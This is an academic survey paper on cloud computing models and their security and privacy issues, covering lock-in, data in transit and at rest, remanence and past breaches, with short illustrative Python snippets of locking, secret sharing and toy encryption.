Analysis of Security Issues and Associated Mitigation Techniques


02 Nov 2017


Cloud computing is a new technology model for enabling convenient, on-demand access to a shared pool of computing resources such as networks, servers, storage, applications and services, which eliminates the need to set up high-cost computing infrastructure for the IT solutions and services an industry needs. It offers a flexible, non-standard architecture that is easily accessible through the internet from any computing device. The cloud allows a multifold increase in storage capacity and can access any kind of data, from any source, through existing or new software. In this state-of-the-art architecture, the entire data resides over a set of networked resources, which enable data access through virtual machines. Hence, the data centres may be located in any part of the world, out of the reach and control of users. However, a variety of issues need to be understood before adopting a new architectural framework, and a range of sensitive security and privacy issues must be addressed in a cloud-based environment. This paper aims to elaborate on and analyse the numerous unresolved issues threatening cloud computing adoption and diffusion, which affect the stakeholders connected with it.

Keywords

Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), Denial of Service (DoS), Interoperability, Distributed Denial of Service (DDoS), Mobile Cloud Computing (MCC), Optical Character Recognition

1. INTRODUCTION

The Internet has been a driving force behind the various

technologies that have been developed since its inception.

Arguably, one of the most discussed among all of them is

Cloud Computing. Over the last few years, the cloud computing

paradigm has witnessed an enormous shift towards its

adoption and it has become a trend in the information

technology space as it promises significant cost reductions and

new business potential to its users and providers [1]. The

advantages of using cloud computing include: i) reduced

hardware and maintenance cost, ii) accessibility around the

globe, and iii) flexibility and highly automated processes

wherein the customer need not worry about mundane concerns

like software up-gradation [2, 3].

A plethora of definitions has been given to explain cloud

computing. Cloud computing is defined as a model for

enabling ubiquitous, convenient, on-demand network access

to a shared pool of configurable computing resources (e.g.

networks, servers, storage devices and services) that can be

rapidly provisioned and released with minimal management

effort or service provider interaction [4]. In such an

environment users need not own the infrastructure for various

computing services. In fact, they can be accessed from any

computer in any part of the world. This integrates features

supporting high scalability and multi-tenancy, offering

enhanced flexibility in comparison to the earlier existing

computing methodologies. It can deploy, allocate or reallocate

resources dynamically with an ability to continuously monitor

their performance [4].

2. CLOUD TAXONOMY,

CHARACTERISTICS AND BENEFITS

Cloud computing can be classified based on the services

offered and deployment models. According to the different

types of services offered, cloud computing can be considered

to consist of three layers. Infrastructure as a Service (IaaS) is

the lowest layer that provides basic infrastructure support

service. Platform as a Service (PaaS) layer is the middle layer,

which offers platform oriented services, besides providing the

environment for hosting user’s applications. Software as a

Service (SaaS) is the topmost layer which features a complete

application offered as service on demand [5, 6].

SaaS ensures that complete applications are hosted on the

internet and accessed directly by users. The payment is made on a pay-per-use model. It eliminates the need to install and run the

application on the customer’s local computer, thus alleviating

the customer’s burden for software maintenance. In SaaS,

there is the Divided Cloud and Convergence coherence

mechanism whereby every data item has either the "Read

Lock" or "Write Lock" [7]. Two types of servers are used by

SaaS: the Main Consistence Server (MCS) and Domain

Consistence Server (DCS). Cache coherence is achieved by

the cooperation between MCS and DCS [8]. In SaaS, if the

MCS is damaged, or compromised, the control over the cloud

environment is lost. Hence securing the MCS is of great

importance.
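The per-item "Read Lock"/"Write Lock" coherence mentioned above can be illustrated with a minimal readers-writer lock sketch in Python. This is a hypothetical illustration of the locking discipline only, not the actual MCS/DCS protocol of [7]; the class and field names are invented:

```python
import threading

class DataItem:
    """Illustrative data item guarded by a readers-writer discipline:
    many concurrent readers ("Read Lock") or one exclusive writer
    ("Write Lock")."""
    def __init__(self, value):
        self._value = value
        self._readers = 0
        self._count_lock = threading.Lock()    # protects the reader count
        self._write_lock = threading.Lock()    # exclusive writer access

    def read(self):
        with self._count_lock:
            self._readers += 1
            if self._readers == 1:
                self._write_lock.acquire()     # first reader blocks writers
        try:
            return self._value
        finally:
            with self._count_lock:
                self._readers -= 1
                if self._readers == 0:
                    self._write_lock.release() # last reader admits writers

    def write(self, value):
        with self._write_lock:                 # writers run alone
            self._value = value

item = DataItem(0)
item.write(42)
assert item.read() == 42
```

The point of the discipline is that concurrent reads never conflict, while a write waits until all readers have drained, which is the basic guarantee a cache-coherence mechanism must preserve.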

In the Platform as a Service approach (PaaS), the offering

also includes a software execution environment. For example,

there could be a PaaS application server that enables the lone

developer to deploy web-based applications without buying

actual servers and setting them up. PaaS model aims to protect

data, which is especially important in case of storage as a

service. In case of congestion, there is the problem of outage

from a cloud environment. Thus the need for security against

outage is important to ensure load balanced service. The data

needs to be encrypted when hosted on a platform for security

reasons. Cloud computing architectures making use of

multiple cryptographic techniques towards providing

cryptographic cloud storage have been proposed in [9].

Infrastructure as a Service (IaaS) refers to the sharing of

hardware resources for executing services, typically using


virtualization technology. Potentially, with IaaS approach,

multiple users use available resources. The resources can

easily be scaled up depending on the demand from user and

they are typically charged on a pay-per-use basis [10]. They

are all virtual machines, which need to be managed. Thus a

governance framework is required to control the creation and

usage of virtual machines. This also helps to avoid

uncontrolled access to user’s sensitive information.

Irrespective of the above mentioned service models, cloud

services can be deployed in four ways depending upon the

customers’ requirements:

· Public Cloud: A cloud infrastructure is provided to

many customers and is managed by a third party

[11]. Multiple enterprises can work on the

infrastructure provided, at the same time. Users can

dynamically provision resources through the internet

from an off-site service provider. Wastage of

resources is checked as the users pay for whatever

they use.

· Private Cloud: Cloud infrastructure, made available

only to a specific customer and managed either by

the organization itself or third party service provider

[11]. This uses the concept of virtualization of

machines, and is a proprietary network.

· Community cloud: Infrastructure shared by several

organizations for a shared cause and may be

managed by them or a third party service provider.

· Hybrid Cloud: A composition of two or more cloud

deployment models, linked in a way that data

transfer takes place between them without affecting

each other.

Moreover, with the technological advancements, we can see

derivative cloud deployment models emerging out of the

various demands and the requirements of users. A virtual private

cloud is one such case wherein a public cloud is used

in a private manner, connected to the internal resources of the

customer’s data-centre [12]. With the emergence of high-end

network access technologies like 2G, 3G, Wi-Fi, Wi-Max etc.

and feature phones, a new derivative of cloud computing has

emerged. This is popularly referred to as "Mobile Cloud

Computing (MCC)". It can be defined as a composition of

mobile technology and cloud computing infrastructure where

data and the related processing will happen in the cloud only

with an exception that they can be accessed through a mobile

device and hence termed as mobile cloud computing [13] as

shown in Fig. 1. It is becoming a trend nowadays, and many organizations are keen to allow their employees to access the office network through a mobile device from anywhere.

Recent technical advancements including the emergence of

HTML5 and various other browser development tools have

only increased the market for mobile cloud-computing. An

increasing trend towards the feature-phone adoption [13] has

also ramped up the MCC market.

Cloud Computing distinguishes itself from other computing

paradigms like grid computing, global computing, and internet

computing in various aspects of on demand service provision,

user centric interfaces, guaranteed QoS (Quality of Service),

and autonomous system [14] etc. A few state of the art

techniques that contribute to cloud computing are:

· Virtualization: It has been the underlying concept

towards such a huge rise of cloud computing in the

modern era. The term refers to providing end users with an environment able to render all the services that the hardware of a personal computer would support [15]. The three

existing forms of virtualization categorized as:

Server virtualization, Storage virtualization and

Network virtualization, have inexorably led to the

evolution of Cloud computing. For example, a

number of underutilized physical servers may be

consolidated within a smaller number of better

utilized servers [16].

· Web Service and SOA: Web services provide

services over the web using technologies like XML,

Web Services Description Language (WSDL),

Simple Object Access Protocol (SOAP), and

Universal Description, Discovery, and Integration

(UDDI). The service organisation inside a cloud is

managed in the form of Service Oriented

Architecture (SOA) and hence we can define SOA

as something that makes use of multiple services to

perform a specific task [17].

· Application Programming Interface (API): Without

APIs it is hard to imagine the existence of cloud

computing. The whole range of cloud services depends on APIs, allowing deployment and

configuration through them. Based on the API

category used viz. control, data and application,

different functions of APIs are invoked and services

are rendered to the users accordingly.

· Web 2.0 /Mash-up: Web 2.0 has been defined as a

technology that enables us to create web pages and

allows the users to interact and collaborate as

creators of user generated content in a virtual

community [18, 19]. It enables the usage of World

Wide Web technology towards a more creative and

a collaborative platform [20]. Mash-up is a web

application that combines data from more than one

source into a single integrated storage tool [21].
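The server consolidation mentioned under virtualization above can be sketched as a simple first-fit packing heuristic. The loads and capacity below are made-up illustrative numbers, and first-fit-decreasing is just one common heuristic, not a claim about how any particular hypervisor places VMs:

```python
def consolidate(vm_loads, server_capacity):
    """First-fit-decreasing heuristic: pack VM CPU loads onto as few
    physical servers as possible. Returns one list of loads per server."""
    servers = []
    for load in sorted(vm_loads, reverse=True):   # place largest VMs first
        for s in servers:
            if sum(s) + load <= server_capacity:
                s.append(load)
                break
        else:
            servers.append([load])                # open a new server
    return servers

# Six VMs at 10-40% CPU fit on two well-utilized hosts instead of six.
placement = consolidate([0.1, 0.4, 0.3, 0.2, 0.25, 0.15], server_capacity=1.0)
print(len(placement))  # → 2
```

This is the essence of the consolidation benefit: the same workload runs on fewer, better-utilized machines.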

These were the few technological advances that led to the

emergence of Cloud Computing and enabled a lot of service

providers to provide the customers a hassle free world of

virtualization fulfilling all their demands. The prominent ones

are: Amazon-EC2 [22, 23] (Elastic Compute Cloud), S3 [22]

(Simple Storage Service), SQS (Simple Queue Service), CF

(Cloud Front), SimpleDB, Google, Microsoft Windows-Azure

[23], ProofPoint, RightScale, Salesforce.com, Workday, Sun

Microsystems etc., and each of them is categorised as

one of the three main classifications based on the cloud

structure they provide: private, public and hybrid cloud. Each

of the above mentioned cloud structure has its own limitations

and benefits.

The enormous growth in this field has changed the way

computing world is perceived. The IT sector has witnessed the

change in the way situations are handled. However, there are

issues that still persist and have become even more compelling

now. The amount of significant resources available at very

low price is acting as a catalyst for distributed attacks on

confidential information.

With a substantial increase in the number of Cloud Computing

deployments, the issues related to security and privacy have

become more sophisticated and more distributed in the sense

that the user base for such services is growing by leaps and

bounds [24, 25]. With an increase in on-demand application

usage, the possibility of cyber attacks also increases.

Individual users have to frequently provide online information

about their identification, and this could be used by attackers

for identity theft. In order to address various security and

privacy issues like: confidentiality, operational integrity,

disaster recovery and identity management, the following schemes should be deployed to ensure data security [26] at least to some extent:

· An encryption scheme to ensure data security in a

highly interfering environment, maintaining security

standards against popular threats to data storage

security.

· The Service Providers should be given limited

access to the data, just to manage it without being

able to see what exactly the data is.

· Stringent access controls to prevent unauthorized

and illegal access to the servers controlling the

network.

· Data backup and redundant data storage to ensure

seamless data retrieval in case of infrastructure

failure like the recent breakdown issues with the

Amazon cloud.

· Distributed identity management and user security is

to be maintained by using either Lightweight

Directory Access Protocol (LDAP), or published

APIs (Application Programming Interfaces) to

connect into identity systems.
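The second point above, letting the provider manage data without being able to read it, amounts to client-side encryption: only ciphertext ever reaches the provider. A minimal sketch, assuming a counter-mode keystream built from stdlib primitives purely for illustration; a production system would use a vetted authenticated cipher such as AES-GCM, not this construction:

```python
import hashlib
import hmac
import secrets

def keystream(key, nonce, length):
    """Derive a pseudo-random keystream by counter-mode hashing
    (illustrative only -- not a vetted cipher)."""
    out = b""
    counter = 0
    while len(out) < length:
        block = hmac.new(key, nonce + counter.to_bytes(8, "big"),
                         hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:length]

def encrypt(key, plaintext):
    nonce = secrets.token_bytes(16)
    ks = keystream(key, nonce, len(plaintext))
    return nonce + bytes(a ^ b for a, b in zip(plaintext, ks))

def decrypt(key, blob):
    nonce, ct = blob[:16], blob[16:]
    ks = keystream(key, nonce, len(ct))
    return bytes(a ^ b for a, b in zip(ct, ks))

key = secrets.token_bytes(32)           # never leaves the customer
blob = encrypt(key, b"account: 1234")   # only this blob goes to the provider
assert decrypt(key, blob) == b"account: 1234"
```

Because the key stays with the customer, the provider can replicate, back up and migrate the blob without ever seeing the plaintext.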

An important aspect of cloud computing is that it does give

rise to a number of security threats from the perspective of

data security for a couple of reasons. Firstly, the traditional

techniques cannot be adopted as these have become quite

obsolete with respect to the ever evolving security threats and

also to avoid data loss in a cloud computing environment. The

second issue is that the data stored in the cloud is accessed a

large number of times and is often subjected to different types

of changes. The data may comprise bank account details, passwords

and highly confidential files, not to be read by someone else

apart from the owner. Hence, even a small error may result in

loss of data security.

This paper is aimed at developing an understanding of the

manifold security threats that hamper the security and privacy

of a user. Characteristics of a secure cloud infrastructure

(public or private) will be discussed, along with its challenges and the ways to solve them.

3. OBSTACLES AND OPPORTUNITIES

FOR CLOUD COMPUTING

In spite of being a buzzword, there are certain aspects

associated with Cloud Computing as a result of which many

organizations are still not confident about moving into the

cloud. Certain loopholes in its architecture have made cloud

computing vulnerable to various security and privacy threats

[27]. A few issues limiting the boundaries of this

transformational concept are:

Fig 1: A Mobile Cloud Computing Scenario

3.1 Privacy and Security

The fundamental factor defining the success of any new

computing technology is the level of security it provides [28,

29, 30]. Whether the data residing in the cloud is secure to a

level so as to avoid any sort of security breach or is it more

secure to store the data away from cloud in our own personal

computers or hard drives? At least we can access our hard

drives and systems whenever we wish to, but cloud servers

could potentially reside anywhere in the world and any sort of

internet breakdown can deny us access to the data stored in the

cloud. The cloud service providers insist that their servers and

the data stored in them is sufficiently protected from any sort

of invasion and theft. Such companies argue that the data on

their servers is inherently more secure than data residing on a

myriad of personal computers and laptops. However, it is also

a part of cloud architecture, that the client data will be

distributed over these individual computers regardless of

where the base repository of data is ultimately located. There

have been instances when their security has been invaded and

the whole system has been down for hours. At least half a dozen security breaches occurred last year, bringing out the

fundamental limitations of the security model of major Cloud

Service Providers (CSP). With respect to cloud computing

environment, privacy is defined as "the ability of an entity to

control what information it reveals about itself to the

cloud/cloud SP, and the ability to control who can access that

information". R. Gellman discusses the standards for

collection, maintenance and disclosure of personally

identifiable information in [24]. Information requiring privacy

and the various privacy challenges need the specific steps to

be taken in order to ensure privacy in the cloud as discussed in

[31, 32].

In case of a public-cloud computing scenario, we have

multiple security issues that need to be addressed in

comparison to a private cloud computing scenario. A public

cloud acts as a host of a number of virtual machines, virtual

machine monitors, and supporting middleware [33] etc. The

security of the cloud depends on the behaviour of these

objects as well as on the interactions between them. Moreover,

in a public cloud enabling a shared multi-tenant environment,

as the number of users increase, security risks get more

intensified and diverse. It is necessary to identify the attack

surfaces which are prone to security attacks and mechanisms

ensuring successful client-side and server-side protection [34].

Because of the multifarious security issues in a public cloud,

adopting a private cloud solution is more secure with an

option to move to a public cloud in future, if needed [35].

The emergence of cloud computing owes significantly to mashups.

A mashup is an application that combines data, or

functionality from multiple web sources and creates new

services using these. As these involve usage of multiple subapplications

or elements towards a specific application, the

security challenges are diverse and intense. Based on this idea,

various security architectures such as: a secure component

model addressing the problem of securing mash-up

applications and an entropy based security framework for

cloud oriented service mash-ups have been proposed in [36,

66]. Also, privacy needs to be maintained, as there is a high chance of an eavesdropper sneaking in.

3.2 Performance Unpredictability, Latency

and Reliability

It has been observed that virtual machines can share CPUs and

main memory in a much better way in comparison to the

network and disk I/O. Different EC2 instances vary more in

their I/O performance than main memory performance [37].

One of the ways to improve I/O performance is to improve

architecture and operating systems to efficiently virtualize

interrupts and I/O channels. Another possibility is to make use

of flash memory which is a type of semiconductor memory

that preserves information even when powered off and since it

has no moving parts, it is much faster to access and uses

comparatively less energy. Flash memory can sustain many

more I/O operations than disks, so multiple virtual machines

with large number of I/O operations would coexist better on

the same physical computer [37].

Latency [38, 39] has always been an issue in cloud computing

with data expected to flow around different clouds. The other

factors that add to the latency are: encryption and decryption

of the data when it moves around unreliable and public

networks, congestion, packet loss and windowing. Congestion

adds to the latency when the traffic flow through the network

is high and there are many requests (could be of same priority)

that need to be executed at the same time. Windowing is a message-passing technique whereby the receiver has to send an acknowledgement to the sender for each earlier-sent packet, and this additional traffic adds to the network latency. Moreover, the performance of the system is

also a factor that should be taken into account. Sometimes the

cloud service providers run short of capacity either by

allowing access to too many virtual machines or reaching

upper throughput thresholds on their Internet links because of

high demand arising from the customer community. This

affects the system performance and adds to the latency of the

system.
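The windowing effect described above can be quantified: a sender may have at most one window of unacknowledged data in flight per round trip, so latency caps throughput regardless of raw link speed. A small sketch (the function name and the example figures are illustrative, not measurements):

```python
def effective_throughput(window_bytes, rtt_seconds, link_bps):
    """A sender cannot exceed one window of unacknowledged data per round
    trip, so throughput is capped at window/RTT (or the raw link rate,
    whichever is lower)."""
    return min(link_bps, (window_bytes * 8) / rtt_seconds)

# A 64 KiB window over a 100 ms round trip caps a 1 Gbit/s link at ~5.2 Mbit/s.
cap = effective_throughput(64 * 1024, 0.100, 1_000_000_000)
print(f"{cap / 1e6:.1f} Mbit/s")
```

This is why latency between geographically distant clouds, rather than bandwidth, often dominates perceived cloud performance.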

3.3 Portability and Interoperability

Organizations may need to change the cloud providers and

there have been cases when companies are unable to move

their data and applications to another cloud platform that they

would prefer over the existing one. Such a scenario is termed

as Lock-in and it refers to the challenges faced by a cloud

customer trying to migrate from one cloud provider to

another. More often, it has been seen that changing a cloud

provider involves multiple risks and may lead to system

breakdown if not executed properly. Nature of Lock-in and

associated issues are very much dependent on the cloud type

being used [40]. In case of a SaaS offering, the customer uses an application provided by the cloud provider. While

migrating between the cloud providers, there may be instances

when the data to be moved does not really fit the data format

as required in the new application. This will require extra

effort to be put in to make sure that the data is arranged in a

format that matches the new application ensuring no data loss

in the process. Additional steps such as: performing regular

data extraction and back-up to a format that is usable even

without the SaaS application, understanding how the

application has been developed and monitored, and the major

interfaces and their integration between the platforms need to

be taken care of.

PaaS lock-in can be observed in cases where the language

used to develop an application on a platform is not supported

on the platform to be migrated to. It is more visible at API

level as different providers offer different APIs. PaaS lock-in

can be avoided if the following points are considered and

addressed:

· Cloud offering with an open architecture and

standard syntax should be supported.

· Understand the application components and

modules specific to the PaaS provider and how the

basic services like monitoring, logging etc. are

performed.

· Understand the control functions specific to the

cloud provider and their counterparts on an Open

platform.

IaaS lock-in depends on the infrastructure services being used.

The most obvious form of IaaS lock-in can be observed in the

form of data lock-in. With more and more data pushed to the

cloud, data lock-in increases unless the cloud provider ensures

data portability. Understanding how the virtual machine

images are maintained and eliminating any provider specific

dependency for a virtual machine environment will serve at

the time of transition from one IaaS platform to another.

Identifying the hardware dependencies will minimize the

issues at the time of migration. In order to avoid these lock-ins,

the customer should be clear of the choices available in the

market and the extent to which they match up to its business,

operational and technical requirements.

Also, some companies use different cloud platforms for

different applications based on their requirements and the

services provided by the cloud service providers (CSPs). In

some cases, different cloud platforms are used for a particular

application or different cloud platforms have to interact with

each other for completing a particular task. The internal

infrastructure of the organization needs to maintain a

balance to handle the interoperability between different cloud

platforms [41]. The risk of outsourced services going out of

control is high in a hybrid, public and private cloud

environment. All data has to be encrypted for proper security,

and key management becomes a difficult task in such

situations [42]. The users have actually no idea of where their

information is stored [43]. Normally, a user’s data is stored in

a shared environment, along with other users’ data. The issue

of inter-security handling becomes important in such cases. A

cloud security management model is discussed in [42] to serve

as a standard for designing cloud security management tools.

The model uses four interoperating layers for managing the

cloud security.

Thus we see that although the buzz of cloud computing

prevails everywhere because of the multi-fold features and

facilities provided by it, there are still issues that need to be

solved in order to reach the landmarks set by it.

3.4 Data Breach through Fibre Optic

Networks

It has been noticed that the security risks for the data in transit

have increased over the last few years. Data transitioning is

quite normal nowadays and may involve multiple data-centres

and other cloud deployment models such as public or

private cloud. Security of the data leaving a data-centre to

another data-centre is a major concern as it has been breached

quite a number of times in recent years.

This data transfer is done over a network of fibre-optic cables

which were considered to be a safe mode of data-transfer,

until recently an illegal fibre eavesdropping device in Telco

Verizon’s optical network placed at a mutual fund company

was discovered by US Security forces [44]. There are devices

that can tap the fibre through which data is being transferred without even disturbing the flow. Although fibre-optic cables are generally laid underground, making physical access difficult, it remains important to ensure data security over the transit networks.

3.5 Data Storage over IP Networks

Online data storage is becoming quite popular now-a-days and

it has been observed that majority of enterprise storage will be

networked in the coming years, as it allows enterprises to

maintain huge chunks of data without setting up the required

architecture. Although there are many advantages of having

online data storage, there are security threats that could cause

data leakage or data unavailability at a crucial hour. Such issues

are observed more frequently in the case of dynamic data that

keeps flowing within the cloud in comparison to static data.

Depending upon the various levels of operations and storage

provided, these networked devices are categorized into SAN

(Storage area network) and NAS (network-attached storage)

and since these storage networks reside on various servers,

there are multiple threats associated with them. Various threat

zones that may affect and cause the vulnerability of a storage

network have been discussed in [45].

Besides these, from a Mobile Cloud Computing (MCC)

perspective, unlike cloud computing there are several

additional challenges that need to be addressed to enable MCC

reach its maximum potential:

· Network accessibility: The Internet has been the major factor in the evolution of cloud computing, and without network (Internet) access it will not be possible to reach the mobile cloud, limiting the applications that can be used.

· Data Latency: Data transfer in a wireless network is

not as continuous and consistent as it is in case of a

dedicated wired LAN. And this inconsistency is

largely responsible for longer time intervals for data

transfer at times. Also, the distance from the source

adds up to the longer time intervals observed in case

of data transfer and other network related activities

because of an increase in the number of intermediate

network components.

· Dynamic Network monitoring and Scalability:

Applications running on mobiles in a mobile cloud

computing platform should be intelligent enough to

adapt to the varying network capacities and also

these should be accessible through different

platforms without suffering any data loss.

Sometimes a user working on a smart phone may need to move to a feature phone, and when he later accesses the application again through a smart phone, he should not encounter any data loss.

· Confidentiality of mobile cloud-based data sharing:

The confidential data on mobile phones using cloud-based

mobile device support might become public

due to a hacked cloud. The root-level access to

cloud services and information can be easily

accessed from a stolen mobile device. If the stolen

device belongs to a system administrator, it may

even provide direct and automated access to highly

confidential information.

· Better access control and identity management:

Cloud computing involves virtualization, and hence

the need for user authentication and control across

the clouds is high. The existing solutions are not

able to handle the case of multiple clouds. Since

data belonging to multiple users may be stored in a

single hypervisor, specific segmentation measures

are needed to overcome the potential weakness and

flaws in hypervisor platform.

Security challenges in a mobile cloud computing environment

are slightly different as compared to the above mentioned

network related challenges. With applications lying in a cloud,

it is possible for the hackers to corrupt an application and gain

access to a mobile device while accessing that application. In

order to avoid these, strong virus-scanning and malware

protection software need to be installed to avoid any type of

virus/malware creeping into the mobile system. Besides, by

embedding device identity protection, like allowing access to

the authorized user based on some form of identity check

feature, unauthorized accesses can be blocked.

Two types of services have been defined in [46], namely (i)

critical security service, and (ii) normal security service. The

resource in a cloud has to be properly partitioned according to

different user’s requests. The maximal system rewards and

system service overheads are considered for the security

service. Hence, we see that although mobile cloud computing

is still in its nascent state, there are various security issues that plague cloud computing and its derivatives.
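The critical/normal service partitioning of [46] can be caricatured as a greedy admission problem. The sketch below is a deliberately simplified model, not the actual formulation of [46]; the request names, costs, rewards and the greedy rule are all hypothetical. It admits critical security services first, then fills the remaining capacity by reward-to-cost ratio:

```python
def partition(capacity, requests):
    """Greedily admit service requests into a shared resource pool:
    critical security services are considered first, then normal
    services in decreasing reward-to-cost order (simplified model)."""
    order = sorted(requests,
                   key=lambda r: (not r["critical"], -r["reward"] / r["cost"]))
    admitted, used = [], 0
    for r in order:
        if used + r["cost"] <= capacity:
            admitted.append(r["name"])
            used += r["cost"]
    return admitted

reqs = [
    {"name": "audit",  "cost": 4, "reward": 10, "critical": True},
    {"name": "scan",   "cost": 3, "reward": 9,  "critical": False},
    {"name": "backup", "cost": 5, "reward": 6,  "critical": False},
]
print(partition(10, reqs))  # → ['audit', 'scan']
```

The trade-off this models is exactly the one the section describes: system reward is maximized subject to the overhead each security service imposes on the shared resource.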

4. DATA STORAGE AND SECURITY IN

THE CLOUD

Many cloud service providers provide storage as a form of

service. They take the data from the users and store them on

large data centres, hence providing users a means of storage.

In spite of claims by the cloud service providers about the

safety of the data stored in the cloud there have been cases

when the data stored in these clouds have been modified or

lost due to some security breach or some human error. Attack

vectors in a cloud storage platform have been discussed and

how the same platform is exploited to hide files with

unlimited storage in [47]. In [47], authors have studied the

storage mechanism of Dropbox (a file storage solution in the

cloud) and carried out three types of attack, viz. Hash Value

manipulation attack, stolen host id attack and direct download

attack. Once the host id is known, the attacker can upload and

link arbitrary files to the victim’s Dropbox account.
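The hash value manipulation attack exploits client-side deduplication: a server that trusts a client-reported content hash will link a file to anyone who merely knows its hash. The toy model below illustrates the flaw; it is not Dropbox's actual protocol, and the class and method names are invented:

```python
import hashlib

class DedupStore:
    """Toy content-addressed store with client-side deduplication.
    The server trusts the hash the client reports -- the weakness
    behind hash-manipulation attacks on deduplicating storage."""
    def __init__(self):
        self.blocks = {}

    def upload(self, claimed_hash, data=None):
        if claimed_hash in self.blocks:
            return "deduplicated"   # no data transferred, nothing verified
        if data is None:
            raise KeyError("unknown hash: full upload required")
        self.blocks[claimed_hash] = data
        return "stored"

store = DedupStore()
secret = b"payroll spreadsheet contents"
h = hashlib.sha256(secret).hexdigest()
store.upload(h, secret)                   # victim uploads the real file
# An attacker who learns only the hash is credited with owning the file:
assert store.upload(h) == "deduplicated"
```

A common mitigation is proof-of-ownership: the server challenges the client to prove possession of the actual bytes rather than just the digest.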

Various cloud service providers adopt different technologies to safeguard the data stored in their clouds. But the question is: is the data stored in these clouds really secure? The virtualized nature of cloud storage makes traditional security mechanisms unsuitable for handling these issues [23]. Service providers use different encryption techniques, such as public-key and private-key encryption, to secure the data stored in the cloud. A technique providing data storage security that utilizes a homomorphic token with distributed verification of erasure-coded data has been discussed in [48]. Trust-based methods are useful in establishing relationships in a distributed environment. A domain-based trust model has been proposed in [49] to handle security and interoperability in cross clouds: every domain has a special agent for trust management, and different trust mechanisms are proposed for users and service providers.

The following aspects of data security should be taken care of while moving to a cloud:

1. Data-in-transit

2. Data-at-rest

3. Data Lineage

4. Data Remanence

5. Data Provenance

In the case of data-in-transit, the biggest risk lies with the encryption technology being used: whether it is up to date against present-day security threats, and whether it uses a protocol that provides both confidentiality and integrity for the data-in-transit. Simply opting for an encryption technology does not serve the purpose. In addition to using an encryption-decryption algorithm for secure data transfer, the data can be broken into packets that are then transferred through disjoint paths to the receiver. This reduces the chances of all the packets being captured by an adversary, and the data cannot be recovered until all the packets are recombined in a particular manner. A similar approach has been discussed in [50, 51].
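One simple way to realize such splitting (a sketch of the general idea, not the specific scheme of [50, 51]) is XOR secret sharing: each share travels along a different path, any proper subset of shares is indistinguishable from random noise, and only combining all of them reconstructs the data.

```python
import secrets

def split_shares(data: bytes, n: int) -> list:
    """Split data into n XOR shares; fewer than n shares reveal nothing."""
    shares = [secrets.token_bytes(len(data)) for _ in range(n - 1)]
    last = bytearray(data)
    for share in shares:          # last = data XOR share1 XOR ... XOR share(n-1)
        for i, b in enumerate(share):
            last[i] ^= b
    shares.append(bytes(last))
    return shares

def combine_shares(shares) -> bytes:
    """XOR all shares together; the random masks cancel, leaving the data."""
    out = bytearray(len(shares[0]))
    for share in shares:
        for i, b in enumerate(share):
            out[i] ^= b
    return bytes(out)

payload = b"credit card: 1234 5678"
shares = split_shares(payload, 4)          # send each share on a disjoint path
assert combine_shares(shares) == payload   # receiver recombines all of them
```

An adversary sitting on any single path sees only uniformly random bytes; capturing the payload requires compromising every path simultaneously.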

Managing data-at-rest in an IaaS scenario is more feasible than over SaaS and PaaS platforms, where the customer has restricted rights over the data and data is generally commingled with other users' data. There have been cases wherein, even after implementing data tagging to prevent unauthorized access, it was possible to access data through the exploitation of an application vulnerability [25]. The main issue with data-at-rest in the cloud is loss of control: in a shared environment, even a non-authorized party may gain access to data it is not supposed to access. However, nowadays, storage devices with built-in encryption are available which are resilient to unauthorized access to a certain extent. Even then, nothing can be done if the encryption and decryption keys themselves become accessible to a malicious user. A lockbox approach, wherein the actual keys are stored in a lockbox and a separate key is needed to access that lockbox, is useful in such a case. In this scenario, a user is provided a key, based on an identity-management technique corresponding to the COI (community of interest) he belongs to, for accessing the lockbox. Whenever the user wants to access the data, he acquires the COI key to the lockbox and then gets appropriate access to the relevant data [9]. Homomorphic encryption techniques, which allow computations to be carried out directly on encrypted data before it is decrypted back into its original form, also provide better means to secure data-at-rest. A simple technique for securing data-at-rest in a cloud computing environment has been mentioned in [52]; it makes use of public-key encryption.
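As a concrete illustration of the homomorphic property, unpadded textbook RSA is multiplicatively homomorphic: multiplying two ciphertexts yields a ciphertext of the product of the plaintexts, so the cloud can compute on data it cannot read. The toy parameters below are for illustration only; real deployments use padded RSA (which loses this property) or dedicated schemes such as Paillier.

```python
# Toy textbook RSA (no padding) illustrating multiplicative homomorphism.
p, q = 61, 53
n = p * q                       # modulus, 3233
phi = (p - 1) * (q - 1)         # 3120
e = 17                          # public exponent
d = pow(e, -1, phi)             # private exponent (modular inverse, Python 3.8+)

def enc(m):                     # encryption: c = m^e mod n
    return pow(m, e, n)

def dec(c):                     # decryption: m = c^d mod n
    return pow(c, d, n)

m1, m2 = 7, 9
c_product = (enc(m1) * enc(m2)) % n      # the server multiplies ciphertexts only
assert dec(c_product) == (m1 * m2) % n   # ...yet the result decrypts to m1*m2
```

The server never sees 7, 9 or 63 in the clear; it manipulates ciphertexts, and only the key holder recovers the result.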

Tracing the data path is known as data lineage, and it is important for auditing purposes in the cloud. Providing data lineage is a challenging task in a cloud computing environment, and more so in a public cloud: since the data flow is no longer linear in a virtualized environment within the cloud, mapping the data flow to ensure the integrity of the data becomes complicated. Proving data provenance is yet another challenging task in a cloud computing environment. Data provenance refers to maintaining the integrity of the data, ensuring that it is computationally correct. A taxonomy of provenance techniques, along with various data provenance techniques, has been discussed in [53].

Another major issue, one that is mostly neglected, is data remanence. It refers to the residual data left behind after a data transfer or data removal. It causes minimal security threats in private cloud offerings, but severe security issues may emerge in public cloud offerings as a result of data remanence [54, 56].

Various cases of cloud security breaches have come to light in the recent past. The cloud-based email marketing services company Epsilon suffered a data breach, due to which a large section of its customers, including JP Morgan Chase, Citibank, Barclays Bank, hotel chains such as Marriott and Hilton, and big retailers such as Best Buy and Walgreens, was heavily affected, and a huge chunk of customer data, including customer email IDs and bank account details, was exposed to the hackers [55].

A similar incident happened with Amazon, causing the disruption of its EC2 services. Popular sites like Quora, Foursquare and Reddit were the main sufferers [57]. The above-mentioned events depict the vulnerability of cloud services.

Another important aspect is that known and popular domains have been used to launch malicious software or hack into companies' secure databases. A similar issue happened with Amazon's S3 platform, where hackers were able to launch corrupted code from a trusted domain [58]. Hence the question that arises is: who is to be given the "trusted" tag? It was also established that Amazon was prone to side-channel attacks: a malicious virtual machine occupying the same server as the target could easily gain access to confidential data [59]. The question is: should such a security policy be in place for these trusted users as well?

An incident related to data loss occurred some time back with the online storage service provider "MediaMax" (also known as "The Linkup"), when, due to a system administration error, active customer data was deleted, leading to huge data loss [60]. The SLA (Service Level Agreement) with a cloud service provider should cover all the scenarios that may cause data loss, whether through human or system-generated error. Hence, it must be ensured that redundant copies of the user data are stored in order to handle any adverse situation leading to data loss.

